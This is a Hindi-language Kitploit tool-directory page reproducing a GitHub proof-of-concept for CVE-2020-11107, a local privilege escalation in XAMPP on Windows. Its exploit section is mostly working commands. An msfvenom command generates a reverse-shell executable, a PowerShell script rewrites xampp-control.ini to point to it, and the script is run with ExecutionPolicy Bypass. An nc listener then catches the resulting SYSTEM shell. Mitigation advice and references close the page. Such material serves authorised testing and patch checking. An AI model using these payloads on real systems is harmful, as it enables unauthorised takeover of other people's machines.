Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation — CVE-2020-11107-स्थानीय-विशेषाधिकार-वृद्धि-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4 | Kitploit
उपकरण/GitHubGitHub/mohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubmohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation

Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-11107-स्थानीय-विशेषाधिकार-वृद्धि-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4

रिपॉजिटरी देखें
118 महीने पहलेअभी तक समीक्षित नहीं

🧨 CVE-2020-11107 – XAMPP स्थानीय विशेषाधिकार वृद्धि (Windows)

📌 अवलोकन

CVE-2020-11107 एक स्थानीय विशेषाधिकार वृद्धि (LPE) भेद्यता है जो Windows पर Apache Friends XAMPP को प्रभावित करती है।

एक अन-प्रिविलेज्ड (सीमित अधिकार वाला) उपयोगकर्ता XAMPP Control Panel कॉन्फ़िगरेशन फ़ाइल (xampp-control.ini) को संशोधित कर सकता है और डिफ़ॉल्ट एडिटर एक्ज़ीक्यूटेबल (notepad.exe) को एक दुर्भावनापूर्ण एक्ज़ीक्यूटेबल से बदल सकता है।
जब कोई अन्य उपयोगकर्ता (जैसे एडमिनिस्ट्रेटर) Control Panel से लॉग खोलता है, तो दुर्भावनापूर्ण बाइनरी पीड़ित के विशेषाधिकारों के साथ निष्पादित होती है, जिसके परिणामस्वरूप विशेषाधिकार वृद्धि होती है।

❗ यह भेद्यता Linux या macOS को प्रभावित नहीं करती।


🎯 प्रभावित संस्करण

  • XAMPP < 7.2.29
  • XAMPP 7.3.x < 7.3.16
  • XAMPP 7.4.x < 7.4.4

परीक्षण किया गया

  • Windows 10
  • XAMPP 7.3.10

🧠 मूल कारण

  • xampp-control.ini वैश्विक रूप से लिखने योग्य है
  • एडिटर / ब्राउज़र पथ विश्वसनीय हैं और निष्पादित किए जाते हैं
  • कॉन्फ़िगरेशन परिवर्तन सभी उपयोगकर्ताओं को प्रभावित करते हैं
  • एक्ज़ीक्यूटेबल पथों पर कोई सत्यापन नहीं

🗂 महत्वपूर्ण फ़ाइलें

C:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe

🔍 भेद्यता का प्रमाण

XAMPP संस्करण सत्यापित करें:

type C:\xampp\properties.ini

उदाहरण आउटपुट:

base_stack_version=7.3.10-1
base_stack_platform=windows-x64

✅ संस्करण भेद्य है।


⚔️ शोषण चरण (PoC)

1️⃣ दुर्भावनापूर्ण पेलोड उत्पन्न करें (हमलावर – Kali)

msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe

2️⃣ पेलोड को लक्ष्य पर स्थानांतरित करें

mkdir C:\temp
# Upload msf.exe into C:\temp

3️⃣ XAMPP कॉन्फ़िगरेशन संशोधित करें (सीमित अधिकार वाला उपयोगकर्ता)

शोषण स्क्रिप्ट (PowerShell):

# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file

स्क्रिप्ट चलाएँ:

powershell -ExecutionPolicy Bypass -File 50337.ps1

4️⃣ ट्रिगर निष्पादन (पीड़ित / एडमिन)

पीड़ित चलाता है:

C:\xampp\xampp-control.exe

फिर Control Panel से कोई भी लॉग फ़ाइल खोलता है।


5️⃣ शेल पकड़ें (हमलावर)

nc -lvnp 4444

✅ परिणाम:

Connection received...
C:\WINDOWS\system32>

🎉 विशेषाधिकार वृद्धि सफल


📈 प्रभाव

  • स्थानीय विशेषाधिकार वृद्धि
  • मनमाना कमांड निष्पादन
  • पूर्ण सिस्टम समझौता (यदि एडमिन इसे ट्रिगर करता है)

🛡 शमन

  • XAMPP को निम्नलिखित संस्करणों (या नए) में अपडेट करें:

    • 7.2.29
    • 7.3.16
    • 7.4.4
  • अनुमतियों को प्रतिबंधित करें:

C:\xampp\xampp-control.ini
  • XAMPP Control Panel को एडमिनिस्ट्रेटर के रूप में चलाने से बचें

📚 संदर्भ

  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11107
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2020-11107
  • Apache Friends Advisory: https://www.apachefriends.org/blog/new_xampp_20200401.html
  • Exploit-DB: https://www.exploit-db.com/exploits/50337
  • Original Research: https://github.com/S1lkys/CVE-2020-11107
टूल डाउनलोड करें